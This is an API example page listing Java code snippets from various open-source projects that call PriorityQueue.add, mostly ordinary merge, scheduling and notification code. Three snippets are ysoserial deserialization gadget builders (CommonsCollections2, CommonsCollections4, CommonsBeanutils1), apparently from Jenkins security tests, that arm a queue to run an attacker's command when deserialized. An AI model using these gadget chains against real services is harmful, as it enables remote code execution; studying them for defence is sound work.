Example usage for java.util PriorityQueue add

List of usage examples for java.util PriorityQueue add

Introduction

On this page you can find example usages of java.util PriorityQueue.add.

Prototype

public boolean add(E e) 

Source Link

Document

Inserts the specified element into this priority queue.

Usage

From source file:org.pepstock.jem.ant.tasks.utilities.SortTask.java

/**
 * Merges a bunch of sorted temporary flat files into a single sorted output stream.
 *
 * @param files the temporary files to merge; each is assumed to be already sorted
 * @param fileOutput stream the merged, sorted lines are written to (flushed and closed here)
 * @param cmp comparator used to order lines across files
 * @param cs character set used to read the input files and to encode the output
 * @return The number of lines sorted.
 * @throws IOException if reading a temporary file or writing the output fails
 */
public static int mergeSortedFiles(List<File> files, FileOutputStream fileOutput, final Comparator<String> cmp,
        Charset cs) throws IOException {
    // Min-heap keyed on each buffer's current head line, so the globally
    // smallest line is always at the top.
    // NOTE(review): assumes every temporary file has at least one line, so
    // peek() is non-null inside the comparator — TODO confirm with
    // BinaryFileBuffer's contract.
    PriorityQueue<BinaryFileBuffer> pq = new PriorityQueue<BinaryFileBuffer>(11,
            new Comparator<BinaryFileBuffer>() {
                public int compare(BinaryFileBuffer i, BinaryFileBuffer j) {
                    return cmp.compare(i.peek(), j.peek());
                }
            });
    BufferedWriter fbw = new BufferedWriter(new OutputStreamWriter(fileOutput, cs));
    int rowcounter = 0;
    try {
        // Open the buffers inside the try so that a failure while opening a
        // later file still closes the already-opened buffers via finally
        // (the original opened them before the try and could leak them).
        for (File f : files) {
            pq.add(new BinaryFileBuffer(f, cs));
        }
        while (!pq.isEmpty()) {
            BinaryFileBuffer bfb = pq.poll();
            String r = bfb.pop();
            fbw.write(r);
            fbw.newLine();
            ++rowcounter;
            if (bfb.empty()) {
                bfb.getBufferReader().close();
                // the temporary file is fully consumed; best-effort delete
                boolean isDeleted = bfb.getOriginalfile().delete();
                if (!isDeleted) {
                    // nop: deletion failure is non-fatal, the temp file is merely left behind
                }
            } else {
                // buffer still has lines: re-insert so its new head is re-ranked
                pq.add(bfb);
            }
        }
    } finally {
        fbw.flush();
        fbw.close();
        for (BinaryFileBuffer bfb : pq) {
            bfb.close();
        }
    }
    return rowcounter;
}

From source file:com.uber.stream.kafka.mirrormaker.controller.core.IdealStateBuilder.java

/**
 * Builds a CUSTOM-mode ideal state for {@code topicName}, assigning each
 * partition to the instance polled from the head of the priority queue and
 * re-queueing that instance so its updated load influences later picks.
 *
 * @param topicName topic to build the ideal state for
 * @param numTopicPartitions number of partitions to assign
 * @param instanceToNumServingTopicPartitionMap queue of candidate instances
 * @return the built ideal state
 */
public static IdealState buildCustomIdealStateFor(String topicName, int numTopicPartitions,
        PriorityQueue<InstanceTopicPartitionHolder> instanceToNumServingTopicPartitionMap) {

    final CustomModeISBuilder builder = new CustomModeISBuilder(topicName);
    builder.setStateModel(OnlineOfflineStateModel.name)
            .setNumPartitions(numTopicPartitions)
            .setNumReplica(1)
            .setMaxPartitionsPerNode(numTopicPartitions);

    for (int partition = 0; partition < numTopicPartitions; ++partition) {
        InstanceTopicPartitionHolder instance = instanceToNumServingTopicPartitionMap.poll();
        if (instance == null) {
            // No live instance available for this partition; leave it unassigned.
            continue;
        }
        builder.assignInstanceAndState(Integer.toString(partition), instance.getInstanceName(), "ONLINE");
        instance.addTopicPartition(new TopicPartition(topicName, partition));
        // Put the instance back so its new partition count is considered next.
        instanceToNumServingTopicPartitionMap.add(instance);
    }
    return builder.build();
}

From source file:com.uber.stream.kafka.mirrormaker.common.utils.HelixUtils.java

/**
 * Builds a CUSTOM-mode ideal state for {@code topicName}, assigning each
 * partition to the instance polled from the head of the shared priority queue
 * and re-queueing that instance so its updated load influences later picks.
 *
 * @param topicName topic to build the ideal state for
 * @param numTopicPartitions number of partitions to assign
 * @param instanceToNumServingTopicPartitionMap shared queue of candidate
 *        instances; accessed under its own monitor because other threads may
 *        mutate it concurrently
 * @return the built ideal state
 */
public static IdealState buildCustomIdealStateFor(String topicName, int numTopicPartitions,
        PriorityQueue<InstanceTopicPartitionHolder> instanceToNumServingTopicPartitionMap) {

    final CustomModeISBuilder customModeIdealStateBuilder = new CustomModeISBuilder(topicName);

    customModeIdealStateBuilder.setStateModel(OnlineOfflineStateModel.name).setNumPartitions(numTopicPartitions)
            .setNumReplica(1).setMaxPartitionsPerNode(numTopicPartitions);

    for (int i = 0; i < numTopicPartitions; ++i) {
        synchronized (instanceToNumServingTopicPartitionMap) {
            InstanceTopicPartitionHolder liveInstance = instanceToNumServingTopicPartitionMap.poll();
            // poll() returns null when the queue is empty; skip the partition
            // instead of throwing an NPE (consistent with the controller-side
            // IdealStateBuilder.buildCustomIdealStateFor implementation).
            if (liveInstance != null) {
                customModeIdealStateBuilder.assignInstanceAndState(Integer.toString(i),
                        liveInstance.getInstanceName(), "ONLINE");
                liveInstance.addTopicPartition(new TopicPartition(topicName, i));
                instanceToNumServingTopicPartitionMap.add(liveInstance);
            }
        }
    }
    return customModeIdealStateBuilder.build();
}

From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections4.java

/**
 * Builds the CommonsCollections4 ysoserial gadget: a PriorityQueue whose
 * TransformingComparator applies a ChainedTransformer of
 * ConstantTransformer -> InstantiateTransformer. The chain is armed only
 * after the queue is populated, so that a later element comparison
 * (intended to be triggered during deserialization) instantiates TrAXFilter
 * with the attacker-supplied TemplatesImpl, running the embedded payload.
 *
 * @param command the OS command baked into the generated TemplatesImpl
 * @return the armed queue, ready to be serialized
 * @throws Exception if building the templates or the reflective field access fails
 */
public Queue<Object> getObject(final String command) throws Exception {
    Object templates = Gadgets.createTemplatesImpl(command);

    // harmless constant (String.class) until armed; swapped for TrAXFilter below
    ConstantTransformer constant = new ConstantTransformer(String.class);

    // mock method name until armed
    Class[] paramTypes = new Class[] { String.class };
    Object[] args = new Object[] { "foo" };
    InstantiateTransformer instantiate = new InstantiateTransformer(paramTypes, args);

    // grab defensively copied arrays so the copies actually held by the
    // transformer can be mutated in place after construction
    paramTypes = (Class[]) Reflections.getFieldValue(instantiate, "iParamTypes");
    args = (Object[]) Reflections.getFieldValue(instantiate, "iArgs");

    ChainedTransformer chain = new ChainedTransformer(new Transformer[] { constant, instantiate });

    // create queue with numbers; the adds happen BEFORE arming, so the
    // comparator runs only over the harmless placeholder configuration
    PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(chain));
    queue.add(1);
    queue.add(1);

    // swap in values to arm
    Reflections.setFieldValue(constant, "iConstant", TrAXFilter.class);
    paramTypes[0] = Templates.class;
    args[0] = templates;

    return queue;
}

From source file:jenkins.security.security218.ysoserial.payloads.CommonsBeanutils1.java

/**
 * Builds the CommonsBeanutils1 ysoserial gadget: a PriorityQueue ordered by a
 * commons-beanutils BeanComparator. The comparator's target property is
 * switched to "outputProperties" after the queue is populated, so that a later
 * element comparison (intended to be triggered during deserialization) invokes
 * getOutputProperties() on the attacker-supplied TemplatesImpl, running the
 * embedded payload.
 *
 * @param command the OS command baked into the generated TemplatesImpl
 * @return the armed queue, ready to be serialized
 * @throws Exception if building the templates or the reflective field access fails
 */
public Object getObject(final String command) throws Exception {
    final Object templates = Gadgets.createTemplatesImpl(command);
    // mock method name until armed: "lowestSetBit" is a harmless BigInteger
    // property used while the queue is being built
    final BeanComparator comparator = new BeanComparator("lowestSetBit");

    // create queue with numbers and basic comparator
    final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);
    // stub data for replacement later
    queue.add(new BigInteger("1"));
    queue.add(new BigInteger("1"));

    // switch method called by comparator
    Reflections.setFieldValue(comparator, "property", "outputProperties");

    // switch contents of queue: write the payload objects directly into the
    // backing array so no comparison (and thus no execution) happens here
    final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
    queueArray[0] = templates;
    queueArray[1] = templates;

    return queue;
}

From source file:org.apache.hama.util.Files.java

/**
 * Merges k sequence files each of size n using knlog(k) merge algorithm.
 * @param  inputPath :the input directory which contains sorted sequence
 *                    files, that have to be merged.
 * @param  fs        :the filesystem/*  w  w  w .  jav  a 2  s .c om*/
 * @param outputPath :the path to the merged sorted sequence file.
 */
public static <KEY extends WritableComparable<? super KEY>, VALUE extends Writable> void merge(FileSystem fs,
        Path inputPath, Path outputPath, Class<KEY> keyClazz, Class<VALUE> valClazz) {

    Configuration conf = fs.getConf();

    PriorityQueue<KVPair<KEY, VALUE>> pq = new PriorityQueue<KVPair<KEY, VALUE>>();

    //Map from KeyValuePair to the split number to which it belongs.
    HashMap<KVPair<KEY, VALUE>, Integer> keySplitMap = new HashMap<KVPair<KEY, VALUE>, Integer>();

    FileStatus[] files;
    SequenceFile.Writer writer = null;
    SequenceFile.Reader reader[] = null;
    try {
        files = fs.listStatus(inputPath);
        reader = new SequenceFile.Reader[files.length];

        for (int i = 0; i < files.length; i++) {
            if (files[i].getLen() > 0) {
                reader[i] = new SequenceFile.Reader(fs, files[i].getPath(), conf);
                KEY key = ReflectionUtils.newInstance(keyClazz, new Object[0]);
                VALUE val = ReflectionUtils.newInstance(valClazz, new Object[0]);

                reader[i].next(key, val);
                KVPair<KEY, VALUE> kv = new KVPair<KEY, VALUE>(key, val);
                pq.add(kv);
                keySplitMap.put(kv, i);
            }
        }

        writer = SequenceFile.createWriter(fs, conf, outputPath, keyClazz, valClazz);

        while (!pq.isEmpty()) {
            KVPair<KEY, VALUE> smallestKey = pq.poll();
            writer.append(smallestKey.getKey(), smallestKey.getValue());
            Integer index = keySplitMap.get(smallestKey);
            keySplitMap.remove(smallestKey);

            KEY key = ReflectionUtils.newInstance(keyClazz, new Object[0]);
            VALUE val = ReflectionUtils.newInstance(valClazz, new Object[0]);

            if (reader[index].next(key, val)) {
                KVPair<KEY, VALUE> kv = new KVPair<KEY, VALUE>(key, val);
                pq.add(kv);
                keySplitMap.put(kv, index);
            }
        }

    } catch (IOException e) {
        LOG.error("Couldn't get status, exiting ...", e);
        System.exit(-1);
    } finally {
        if (writer != null) {
            try {
                writer.close();
            } catch (IOException e) {
                LOG.error("Cannot close writer to sorted seq. file. Exiting ...", e);
                System.exit(-1);
            }
        }
    }
}

From source file:jenkins.security.security218.ysoserial.payloads.CommonsCollections2.java

/**
 * Builds the CommonsCollections2 ysoserial gadget: a PriorityQueue ordered by
 * a TransformingComparator wrapping an InvokerTransformer. The transformer's
 * method name is switched to "newTransformer" after the queue is populated, so
 * that a later element comparison (intended to be triggered during
 * deserialization) invokes newTransformer() on the attacker-supplied
 * TemplatesImpl, running the embedded payload.
 *
 * @param command the OS command baked into the generated TemplatesImpl
 * @return the armed queue, ready to be serialized
 * @throws Exception if building the templates or the reflective field access fails
 */
public Queue<Object> getObject(final String command) throws Exception {
    final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
    // mock method name until armed: "toString" is harmless while the queue is built
    final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);

    // create queue with numbers and basic comparator
    final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, new TransformingComparator(transformer));
    // stub data for replacement later
    queue.add(1);
    queue.add(1);

    // switch method called by comparator
    Reflections.setFieldValue(transformer, "iMethodName", "newTransformer");

    // switch contents of queue: write directly into the backing array so no
    // comparison (and thus no execution) is triggered here
    final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");
    queueArray[0] = templates;
    queueArray[1] = 1;

    return queue;
}

From source file:main.java.RMDupper.java

/**
 * Routes an incoming read: unmapped / mapping-quality-zero reads are written
 * straight to the output, everything else is buffered for duplicate checking.
 * Before buffering, any reads whose end coordinate lies before the current
 * read's start are flushed through {@code checkForDuplication}.
 */
public static void queueOrOutput(DupStats dupStats, OccurenceCounterMerged occurenceCounterMerged,
        SAMFileWriter outputSam, Boolean allReadsAsMerged,
        PriorityQueue<ImmutableTriple<Integer, Integer, SAMRecord>> recordBuffer,
        PriorityQueue<ImmutableTriple<Integer, Integer, SAMRecord>> duplicateBuffer, Set<String> discardSet,
        SAMRecord curr) {
    // Unmapped or MQ0 reads are never duplicate candidates: pass them through.
    if (curr.getReadUnmappedFlag() || curr.getMappingQuality() == 0) {
        outputSam.addAlignment(curr);
        return;
    }
    // Buffered triples are (alignmentStart, alignmentEnd, record); if the head
    // of the buffer ends before the current read starts, that window is done.
    boolean headEndsBeforeCurrent = !recordBuffer.isEmpty()
            && recordBuffer.peek().middle < curr.getAlignmentStart();
    if (headEndsBeforeCurrent) {
        checkForDuplication(dupStats, occurenceCounterMerged, outputSam, allReadsAsMerged, recordBuffer,
                duplicateBuffer, discardSet);
    }
    recordBuffer.add(new ImmutableTriple<Integer, Integer, SAMRecord>(curr.getAlignmentStart(),
            curr.getAlignmentEnd(), curr));
}

From source file:org.apache.hadoop.mapred.PoolFairnessCalculator.java

/**
 * This method takes a list of {@link PoolMetadata} objects and calculates
 * fairness metrics of how well scheduling is doing.
 *
 * The goals of the fair scheduling are to insure that every pool is getting
 * an equal share.  The expected share of resources for each pool is
 * complicated by the pools not requiring an equal share
 * or pools that have a minimum or maximum allocation of resources.
 *
 * @param poolMetadataList List of all pool metadata (null/empty is a no-op)
 * @param metricsRecord Where to write the metrics
 */
public static void calculateFairness(final List<PoolMetadata> poolMetadataList,
        final MetricsRecord metricsRecord) {
    if (poolMetadataList == null || poolMetadataList.isEmpty()) {
        return;
    }

    // Find the total available usage and guaranteed resources by resource
    // type.  Add the resource metadata to the sorted set to schedule if
    // there is something to schedule (desiredAfterConstraints > 0)
    long startTime = System.currentTimeMillis();
    Map<String, TotalResourceMetadata> resourceTotalMap = new HashMap<String, TotalResourceMetadata>();
    Map<String, Set<ResourceMetadata>> resourceSchedulablePoolMap = new HashMap<String, Set<ResourceMetadata>>();
    for (PoolMetadata poolMetadata : poolMetadataList) {
        for (String resourceName : poolMetadata.getResourceMetadataKeys()) {
            ResourceMetadata resourceMetadata = poolMetadata.getResourceMetadata(resourceName);
            TotalResourceMetadata totalResourceMetadata = resourceTotalMap.get(resourceName);
            if (totalResourceMetadata == null) {
                totalResourceMetadata = new TotalResourceMetadata();
                resourceTotalMap.put(resourceName, totalResourceMetadata);
            }
            totalResourceMetadata.totalAvailable += resourceMetadata.getCurrentlyUsed();

            Set<ResourceMetadata> schedulablePoolSet = resourceSchedulablePoolMap.get(resourceName);
            if (schedulablePoolSet == null) {
                schedulablePoolSet = new HashSet<ResourceMetadata>();
                resourceSchedulablePoolMap.put(resourceName, schedulablePoolSet);
            }
            if (resourceMetadata.getDesiredAfterConstraints() > 0) {
                if (!schedulablePoolSet.add(resourceMetadata)) {
                    throw new RuntimeException(
                            "Duplicate resource metadata " + resourceMetadata + " in " + schedulablePoolSet);
                }
            }
        }
    }

    // First, allocate resources for all the min guaranteed resources
    // for the pools.  Ordering is done by the largest
    // min(min guaranteed, desired).
    GuaranteedDesiredComparator guaranteedDesiredComparator = new GuaranteedDesiredComparator();
    List<ResourceMetadata> removePoolList = new ArrayList<ResourceMetadata>();
    for (Map.Entry<String, TotalResourceMetadata> entry : resourceTotalMap.entrySet()) {
        List<ResourceMetadata> resourceMetadataList = new ArrayList<ResourceMetadata>(
                resourceSchedulablePoolMap.get(entry.getKey()));
        TotalResourceMetadata totalResourceMetadata = entry.getValue();
        Collections.sort(resourceMetadataList, guaranteedDesiredComparator);
        // Round-robin one unit at a time until resources run out or every
        // pool has reached its guaranteed/desired level.
        while ((totalResourceMetadata.totalAllocated < totalResourceMetadata.totalAvailable)
                && !resourceMetadataList.isEmpty()) {
            removePoolList.clear();
            for (ResourceMetadata resourceMetadata : resourceMetadataList) {
                if (resourceMetadata.getExpectedUsed() == resourceMetadata.getGuaranteedUsedAndDesired()) {
                    removePoolList.add(resourceMetadata);
                    continue;
                }
                resourceMetadata.incrExpectedUsed();
                ++totalResourceMetadata.totalAllocated;
            }
            resourceMetadataList.removeAll(removePoolList);
        }
        LOG.info("After allocating min guaranteed and desired - " + "Resource type " + entry.getKey()
                + " totalAvailable=" + totalResourceMetadata.totalAvailable + ", totalAllocated="
                + totalResourceMetadata.totalAllocated);
    }

    // At this point, all pools have been allocated their guaranteed used and
    // desired resources.  If there are any more resources to allocate, give
    // resources to lowest allocated pool that hasn't reached desired
    // until all the resources are gone
    ExpectedUsedComparator expectedUsedComparator = new ExpectedUsedComparator();
    PriorityQueue<ResourceMetadata> minHeap = new PriorityQueue<ResourceMetadata>(100, expectedUsedComparator);
    for (Map.Entry<String, TotalResourceMetadata> entry : resourceTotalMap.entrySet()) {
        minHeap.addAll(resourceSchedulablePoolMap.get(entry.getKey()));
        TotalResourceMetadata totalResourceMetadata = entry.getValue();
        while ((totalResourceMetadata.totalAllocated < totalResourceMetadata.totalAvailable)
                && !minHeap.isEmpty()) {
            ResourceMetadata resourceMetadata = minHeap.remove();
            // Pools already at their desired level drop out of the heap.
            if (resourceMetadata.getExpectedUsed() == resourceMetadata.getDesiredAfterConstraints()) {
                continue;
            }
            resourceMetadata.incrExpectedUsed();
            ++totalResourceMetadata.totalAllocated;
            minHeap.add(resourceMetadata);
        }
        minHeap.clear();
    }

    // Now calculate the difference of the expected allocation and the
    // actual allocation to get the following metrics.  When calculating
    // the percent bad allocated divide by 2 because the difference double
    // counts a bad allocation
    // 1) total tasks difference between expected and actual allocation
    //    0 is totally fair, higher is less fair
    // 2) % of tasks incorrectly allocated
    //    0 is totally fair, higher is less fair
    // 3) average difference per pool
    //    0 is totally fair, higher is less fair
    // 4) standard deviation per pool
    //    0 is totally fair, higher is less fair
    for (PoolMetadata poolMetadata : poolMetadataList) {
        for (String resourceName : poolMetadata.getResourceMetadataKeys()) {
            ResourceMetadata resourceMetadata = poolMetadata.getResourceMetadata(resourceName);
            int diff = Math.abs(resourceMetadata.getExpectedUsed() - resourceMetadata.getCurrentlyUsed());
            LOG.info("Pool " + poolMetadata.getPoolName() + ", resourceName=" + resourceName + ", expectedUsed="
                    + resourceMetadata.getExpectedUsed() + ", currentUsed="
                    + resourceMetadata.getCurrentlyUsed() + ", maxAllowed=" + resourceMetadata.getMaxAllowed()
                    + ", desiredAfterConstraints=" + resourceMetadata.getDesiredAfterConstraints()
                    + ", guaranteedUsedAndDesired=" + resourceMetadata.getGuaranteedUsedAndDesired() + ", diff="
                    + diff);
            TotalResourceMetadata total = resourceTotalMap.get(resourceName);
            total.totalFairnessDifference += diff;
            // widen before multiplying: a plain int diff * diff can overflow
            // before being accumulated
            total.totalFairnessDifferenceSquared += (long) diff * diff;
        }
    }
    TotalResourceMetadata allResourceMetadata = new TotalResourceMetadata();
    allResourceMetadata.resourceTypeCount = resourceTotalMap.size();
    for (TotalResourceMetadata totalResourceMetadata : resourceTotalMap.values()) {
        allResourceMetadata.totalAvailable += totalResourceMetadata.totalAvailable;
        allResourceMetadata.totalFairnessDifference += totalResourceMetadata.totalFairnessDifference;
        allResourceMetadata.totalFairnessDifferenceSquared += totalResourceMetadata.totalFairnessDifferenceSquared;
    }
    resourceTotalMap.put("all", allResourceMetadata);
    StringBuilder metricsBuilder = new StringBuilder();
    for (Map.Entry<String, TotalResourceMetadata> entry : resourceTotalMap.entrySet()) {
        TotalResourceMetadata totalResourceMetadata = entry.getValue();
        totalResourceMetadata.percentUnfair = (totalResourceMetadata.totalAvailable == 0) ? 0
                : totalResourceMetadata.totalFairnessDifference * 100f / 2
                        / totalResourceMetadata.totalAvailable;
        totalResourceMetadata.stdDevUnfair = (float) Math
                .sqrt((double) totalResourceMetadata.totalFairnessDifferenceSquared / poolMetadataList.size()
                        / totalResourceMetadata.resourceTypeCount);
        totalResourceMetadata.averageUnfairPerPool = (float) totalResourceMetadata.totalFairnessDifference
                / poolMetadataList.size() / totalResourceMetadata.resourceTypeCount;

        metricsRecord.setMetric(FAIRNESS_DIFFERENCE_COUNT_PREFIX + entry.getKey(),
                totalResourceMetadata.totalFairnessDifference);
        metricsBuilder.append(FAIRNESS_DIFFERENCE_COUNT_PREFIX + entry.getKey() + "="
                + totalResourceMetadata.totalFairnessDifference + "\n");
        metricsRecord.setMetric(FAIRNESS_PERCENT_UNFAIR_PREFIX + entry.getKey(),
                totalResourceMetadata.percentUnfair);
        metricsBuilder.append(FAIRNESS_PERCENT_UNFAIR_PREFIX + entry.getKey() + "="
                + totalResourceMetadata.percentUnfair + "\n");
        metricsRecord.setMetric(FAIRNESS_DIFFERENCE_PER_POOL_PREFIX + entry.getKey(),
                totalResourceMetadata.averageUnfairPerPool);
        metricsBuilder.append(FAIRNESS_DIFFERENCE_PER_POOL_PREFIX + entry.getKey() + "="
                + totalResourceMetadata.averageUnfairPerPool + "\n");
        metricsRecord.setMetric(FAIRNESS_UNFAIR_STD_DEV_PERFIX + entry.getKey(),
                totalResourceMetadata.stdDevUnfair);
        metricsBuilder.append(FAIRNESS_UNFAIR_STD_DEV_PERFIX + entry.getKey() + "="
                + totalResourceMetadata.stdDevUnfair + "\n");
        metricsBuilder.append(
                TOTAL_RESOURCES_PREFIX + entry.getKey() + "=" + totalResourceMetadata.totalAvailable + "\n");
    }

    if (LOG.isInfoEnabled()) {
        LOG.info("calculateFairness took " + (System.currentTimeMillis() - startTime) + " millisecond(s).");
    }
    if (LOG.isDebugEnabled()) {
        LOG.debug("\n" + metricsBuilder.toString());
    }
}

From source file:com.hortonworks.registries.schemaregistry.HAServerNotificationManager.java

/**
 * Best-effort notification of every peer server: POSTs {@code postBody} as
 * JSON to {@code urlPath} on each known host, retrying each host up to
 * MAX_RETRY times with a back-off proportional to the attempt number.
 * Failures are logged, never thrown.
 *
 * @param urlPath path appended to each peer's base URL
 * @param postBody object serialized as the JSON POST body
 */
private void notify(String urlPath, Object postBody) {
    // If Schema Registry was not started in HA mode then serverUrl is null;
    // in that case don't bother making POST calls.
    if (serverUrl != null) {
        // Each queue entry is (attempt number, host IP); failed hosts re-enter
        // the queue with an incremented attempt number.
        PriorityQueue<Pair<Integer, String>> queue = new PriorityQueue<>();
        synchronized (UPDATE_ITERATE_LOCK) {
            hostIps.stream().forEach(hostIp -> {
                queue.add(Pair.of(1, hostIp));
            });
        }

        while (!queue.isEmpty()) {
            Pair<Integer, String> priorityWithHostIp = queue.remove();

            // NOTE(review): a new JAX-RS client is built per request and never
            // closed; consider creating and closing a single Client instance.
            WebTarget target = ClientBuilder.newClient()
                    .target(String.format("%s%s", priorityWithHostIp.getRight(), urlPath));
            Response response = null;

            try {
                response = target.request().post(Entity.json(postBody));
            } catch (Exception e) {
                LOG.warn("Failed to notify the peer server '{}' about the current host debut.",
                        priorityWithHostIp.getRight());
            }

            boolean succeeded = response != null
                    && response.getStatus() == Response.Status.OK.getStatusCode();
            if (succeeded) {
                // Success must win regardless of the attempt number: the
                // original branch order logged "giving up" for a request that
                // succeeded on the final (MAX_RETRY-th) attempt.
                LOG.info("Notified the peer server '{}' about the current host debut.",
                        priorityWithHostIp.getRight());
            } else if (priorityWithHostIp.getLeft() < MAX_RETRY) {
                queue.add(Pair.of(priorityWithHostIp.getLeft() + 1, priorityWithHostIp.getRight()));
            } else {
                LOG.warn(
                        "Failed to notify the peer server '{}' about the current host debut, giving up after {} attempts.",
                        priorityWithHostIp.getRight(), MAX_RETRY);
            }
            // release the connection associated with the response
            if (response != null) {
                response.close();
            }

            try {
                // back off proportionally to the attempt number
                Thread.sleep(priorityWithHostIp.getLeft() * 100);
            } catch (InterruptedException e) {
                // restore the interrupt flag so callers can observe it
                Thread.currentThread().interrupt();
                LOG.warn("Failed to notify the peer server '{}'", priorityWithHostIp.getRight(), e);
            }
        }

    }
}